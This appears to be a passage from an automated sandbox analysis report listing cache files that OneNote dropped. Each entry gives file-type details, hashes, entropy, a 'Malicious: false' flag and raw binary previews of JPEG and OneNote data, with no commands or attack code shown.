Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000020.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.515175365192018
Encrypted:	false
SSDEEP:	192:/s3T4cJ05kO19le7pm9wh3Vg9WIr6Ql1NY3PhLXlZBzYiKRtAbffQ7Mat1jT:0jO19l2Wwh3i/v43Phj/BfKRtq+h
MD5:	CFD3185442CA7ADFF0CDA3A2BBAF28ED
SHA1:	FAE36A5B344E217721078F85DAAC3C80EEA0B9A2
SHA-256:	A44FC5C63F684DDF226449C52559113E4F4B40C8F8AC4AFC3D3FBA2551AE1E14
SHA-512:	729F249B06F7808EBC27FA9CEB0599A16502F9366718F34934B432E8DC2616BE3F5FE38E6612B0D71FDFAAAB1921601DB028DFEE1C751A11A53C882265CBEAC4
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>.......0...v................................I.......I.qk..B.....LZ.&\.9....&\....<..l$[r..&\....<..l$[r..&\..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..................w{....L.......N...^...............jxD.\..D....%v........."...4...............................b....I.qk..B.....LZ.................w{....L................w{....L.............&\......&\......&\..........................................&\j.....&\T.x...&\......&\..4...&\H.....&\ .....&\$.....&\..j...............;........4...4...4..............&\:.&\j.&\..z...y.. x.. ...........$........!..7!..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.0............&\:.&\L.&\..z...y.. x.. ...........$........!..7!.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000021.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000022.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.237140097936214
Encrypted:	false
SSDEEP:	384:gWM4VmeO+TM/z+CkS4Cmnv/RSzguIF2oE4Cq:NM4VmgTM/z+CkHCmnv/RAguIF2oE4Cq
MD5:	42EF33610EB363CCF0754CCBA4A8D842
SHA1:	F5C3D6204CD54B5CC0EBF39FBC9E84148F4D5F3B
SHA-256:	943A3B73B4C6AA1BD5FC14BA069A45691566886BB2FE2224FB31470788383C03
SHA-512:	E8C19A1B212CF0B253E373E216A6FD218C2A0E0A711E7273B7D79FEE7D105A9C8B5BD15283D08A5522D795DD243E9610F77DA39A8A948E82F5A33D2A1CE9C3E8
Malicious:	false
Preview:	2...>.......r...v.......p ..X/..2...>.......j...v...6....-..x........LZ.................;.@.\3...Uh.............;.@.\3...Uh....2...>.......r...v........-..x...........v........-..x....................I.......I.qk..B.....LZ....T.......S....."oE....S....."oE.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............`...V...b..7<......N...^....................;.@.\3...Uh........4....................;.@.\3...Uh.........I.qk..B.....LZ.............`...V...b..7<..................................................................................................j.......T)y...............4.......a.......l.....$.N.$...$.................;........4...4...4............'...%.........z...,4. ...........$>........4.@!..7..............................D..n4..o4..p4...4. ..u-...............................;........4...4...4............................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000023.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000024.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.761757753845994
Encrypted:	false
SSDEEP:	192:IsViKJW4XhzVt9pBs1UW3Lg10r2/ga67OX483y77RtCAVyHO7:9TPX5VvpBsTY0r2b6k4WyvRtFyu7
MD5:	17741BB7A233DEF377CDB65BD185462B
SHA1:	46772D929512BBDAFF5D841229A2C41B788AC840
SHA-256:	6E2D0F3BDDC0D8FEA01D45687707094BF31E607C8BCAB17AC0D8208A50E71ACE
SHA-512:	BEC2F947326E85CC9600F7C951C2F2557C7F652193F673BB25EE94E943AF99ABF09E9DCBB8EF363B5644F1FE03D9BA8F5CB7304D9E3391C815BA0DCF7918F142
Malicious:	false
Preview:	2...>...h.......v........ .. !..2...>...........v.......@................................................................................................................................................I.......I.qk..B.....LZAg..9...Ag...x...b...."Ag...x...b...."Ag...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............H.e........>]..g....N...^................'.T.0@E...................>....................................I.qk..B.....LZ............H.e........>]..g.................................Ag......Ag......Ag..........................................Ag.j....Ag.T.~..Ag......Ag...P..Ag.H....Ag. ....Ag.$....Ag...n...............;........4...4...4.............Ag.:Ag.jAg...z...y.. x.. ...........$........!..7!..7........o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.0...........Ag.:Ag.LAg...z...y.. x.. ...........$........!..7!.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000025.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000026.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.667456586912036
Encrypted:	false
SSDEEP:	192:dsI9duVqwX6bAsiUSBxuXgTXL25ijFRthfm15sk0mX9cEP9ze57l0GUOFYaUwsF:iWduVqwXgCd/x6eFRth+15sk0mtchBlU
MD5:	90F7465C6B9923BDA931E76E4CE3306A
SHA1:	FD9DF2768EA6C20C9722A736B1EB6606EC31FDF5
SHA-256:	B07EEC8AEF0DD3C263AF30A01D7CDD4D40BA90AC6BD93C83CF4EDEE02B9BFEC2
SHA-512:	D37B44316FB644C770CBBB0365C0E7909ED75A830ADF26FD693A34E9EF972996860619C985BE83840B09F97A2E284ECA8FF90F955104D2C7D9744B8BAD9DCE2C
Malicious:	false
Preview:	4...>.......N...v..."...( ...+..4...>...........v...j...@...............................................................................................................................................I.......I.qk..B.....LZH.......H...0M...k_..8..H...0M...k_..8..H....I.qk..B.....LZ.I........E...x {R...............I.......I...................................................I.t.....I................................................................4..'...'.............S..o...G.1(.%..........f...Z..................H.??5.d.Y....N...^........................................I.qk..B.....LZ...................H.??5.d.Y.................................H.......H.......H................................................c.....(.Z.....(....H..j....H..T.u..H.......H....2..H....m.......z.......R...................!..7............W.i.n.g.d.i.n.g.s......333..................;........4...4...4.............H..:H..LH..YH..KH....z...y.. x.. ........ ..$...$........!..7!..7............o.e.L.o.c.I.D...o.e.L

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000027.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000028.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.609033205052034
Encrypted:	false
SSDEEP:	192:VJLsyLKdUjAkdQP6+CaESXsMXnR/JX9RtI+tVKeyc9HszklpJW0NPdF9rw/:QyLIUjAwQPVCn2vRBX9RtrVJygHFpdFQ
MD5:	01E6C80237C51A43B53B7B68752B4FA0
SHA1:	C2750672AC3AF61D1E6C7F31E051FC6D42A6DD69
SHA-256:	20678678FA41048B11307C935EB7591971AEDDEF5B03307E9EA325F9AAE49150
SHA-512:	6A4228ED1E67BE473815A97B7D41789CD561CB7CB892865C48E2491F56585161EB541A910046D293A4ED847EC17A60CDA7788E343029D32EAD3B26D6B351C78A
Malicious:	false
Preview:	2...>.......<...v.......` ..`+..2...>...........v...X...@...P...........................................................................................................................................I.......I.qk..B.....LZ.E.G....EK^...8c._..M..EK^...8c._..M..E..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............]...8M.;.w...c....N...^.................\|....@..7n..-.............j....................................I.qk..B.....LZ.............]...8M.;.w...c..................................E......E......E..........................................Ej.....ET)z...E..`...E......E..D...E..a...E$.6.$.E$.................;........4...4...4..............E;.EY.EX.E..z...y.. x.. ........ ..$...$........D...E.......!..7!..7............o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.9.........$....................z.......R.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000029.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	4.6923195586223265
Encrypted:	false
SSDEEP:	768:M9vNPlFlv1RWvTY8nENVQrEXqbchkcoY03z9Q:6lPlbtneX4XrhA3z9Q
MD5:	3DF7C62B9D30AAA6C596181023E13485
SHA1:	198D9C133CC59BCF0B3A569224BBF16F4E4E2644
SHA-256:	1A70412E8D3BD4251AF01CED1A4F8E24C0C16564F6B7B7135682673910A55F09
SHA-512:	FE221B7C821E9AA79C76F29F440659064008D042D4463B683E5672D5E88604E8956DBDE6503FB84E2A4FFF514C4F3AD5DE4562D924ED327FF1AB57142CBB7D36
Malicious:	false
Preview:	....Z....&.......%...&..0...( .. @...`..............Z...2&.......%...&.....( .. @...`..H...................................................................Z...J&.......%......(...( .. @...`..........B.......B..a..HG..}y.Z/.............6.K..P..#L...R..i'....5.&$P..R.8.#YXM6.8..p.9..8.#.....W.w..L.....].......................................................................B..T.......T.....O.T$......T.......T$5..{..T.`..:.:T$...oa<T.............0...........e....4........................~.K$.hcM..~.........(...`E......(...$...B.i.n.o.c.u.l.a.r.s. .C.o.r.n.e.r...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.r...P.a.g.e.V.e.r.C.o.m.m.e.n.t...P.a.g.e.O.v.e.r.i.d.e...P.a.g.e.N.a.m.e...0...0.0.0.8...1.....0...U.n.t.i.t.l.e.d. .p.a.g.e.........&.......&.......C.$...p{.......{..<.H.O.R.D./..2...\.......d.......p...v...........W....@......&...{...[.7...............0...........e....4.........................u.4..G..p.".a.....(...P.u.....(..."...B.l.u.e. .M.i.s.t. .M.a.r.g.i.n...j...P.a.g.e.L.o.c.I.D...L.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.352680336674789
Encrypted:	false
SSDEEP:	48:8Bsx6w8scXL7rXMt8tYt3MNE8oZXk5q9Ou5DcTrdhSrky5YtX709BszdZ7nlw9:8BscL7rf66E8cXkM999GRAzys
MD5:	90675D3546A1255E7900E8EC934DAA4C
SHA1:	ABBC54F4B5BB5EEC30FC4EF6AAAF3C25B1A52D55
SHA-256:	6FAA7D596A3D0A3C12D487E9F37628497260A1583347F23F149D7F44FEA0CC48
SHA-512:	56254F7BCE4352767A0EFE00EB0BB29626E0D4178FCC6E0C6346C7CD91BB2D95797A9E4579CA0C00F8C8AAA7CF0913A05CCB11FD987025326F4B24076DC74EF2
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.;......;N....q1..Gn..;N....q1..Gn..;..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................n....ve.+'".....N...^..................gV{hA.`.l.;zU........f........................................I.qk..B.....LZ................n....ve.+'".............n....ve.+'"...........;......;......;..........................................;j.....;T.]...;......;..B...;H.....;..B...;..>.).;..J...................;........4...4...4.."...............;..;..;..z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4..........;......;....#.;............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
Category:	dropped
Size (bytes):	12654
Entropy (8bit):	7.745439197485533
Encrypted:	false
SSDEEP:	384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
MD5:	4BCCCDBB4273ECEBE216C84930A8D0B2
SHA1:	FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
SHA-256:	474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
SHA-512:	DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+.....4W...lUFh....v..._..wn...dW....y._..v..E~......@wn...dW....y._...v..U..@wn...d..{`;.\|U.2g....3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.353733817353949
Encrypted:	false
SSDEEP:	96:os7/isDuQSLKgEpaXku29VxkRACTuc3/S3y/:oszisDuQSW9paXkb9VxkRAq5P
MD5:	DBDFE0671621CC658D3310852FDCEDE6
SHA1:	D51AF27E75B9AD4C7C261E3B9FD263B76EF386DB
SHA-256:	B9AD91ED2286D26CBDC202B601C057743EB56B45881C3C9173337FEFDC277993
SHA-512:	1B204A1546B20ABF8D1635D09B0646C5EEBEA1519D7C45E98E78CB992487AD477447A617C8AE27F6537D0785A129B12A10D50A8C364F74F454B97DD63FD680B6
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ..c.......c..<....)HS....c..<....)HS....c..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............@Es.9.Ato..b....N...^................%.\.F.A..............f........................................I.qk..B.....LZ.............@Es.9.Ato..b.........@Es.9.*Ato..b...........c.......c.......c...........................................cj......cT.]....c.......c..B....cH......c..B....c..>.)..c..J...................;........4...4...4.."................c...c...c..z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4...........c.......c....#..c............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
Category:	dropped
Size (bytes):	2695
Entropy (8bit):	7.434963358385164
Encrypted:	false
SSDEEP:	48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
MD5:	B23DE98D5B4AFC269ED7EBFDDECE9716
SHA1:	10AF507A8079293A9AE0E3B96CF63A949B4588AA
SHA-256:	646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
SHA-512:	BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..\|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=..f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..\|.Y\|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N\|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y..Ib...VZ+......Y.........'.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.354487021310167
Encrypted:	false
SSDEEP:	48:e42s1cbrRdR2geBt0Z6E/EuKXMf97dlclrdhSr3C2tXW4593D4Cd:e42s10NWgAbE//KX097dlARAtLf
MD5:	00100E68C8F9307C15427AF5066A9E67
SHA1:	E3F183C76ED34F14821192E0AA06447DF1C3CC03
SHA-256:	12E8C70243FB2829F556D4172DE26D1FAB86E61291047C37EBE260D5F2D42678
SHA-512:	15C1F2F0020C4FBBC623956D82B9B730BDE6CAD4C34374B9778804F33D131A60DF6D5A0EE9F6B65FD7D7E300C6E80D6B49A6779F44A9DBFCB0A007C44EB751B5
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZR.......R..............R..............R....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............f`...j.-XR,d..m....N...^...............c.9....J.......]........f........................................I.qk..B.....LZ.............f`...j.-XR,d..m.........f`...j.-XR,d..m.........R.......R.......R...........................................R..j....R..T.]..R.......R....B..R..H....R....B..R....>.)R....J...................;........4...4...4.."..............R...R...R....z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4.........R.......R......#R..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
Category:	dropped
Size (bytes):	11040
Entropy (8bit):	7.929583162638891
Encrypted:	false
SSDEEP:	192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
MD5:	02775A1E41CF53AC771D820003903913
SHA1:	2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
SHA-256:	83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
SHA-512:	5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
Malicious:	false
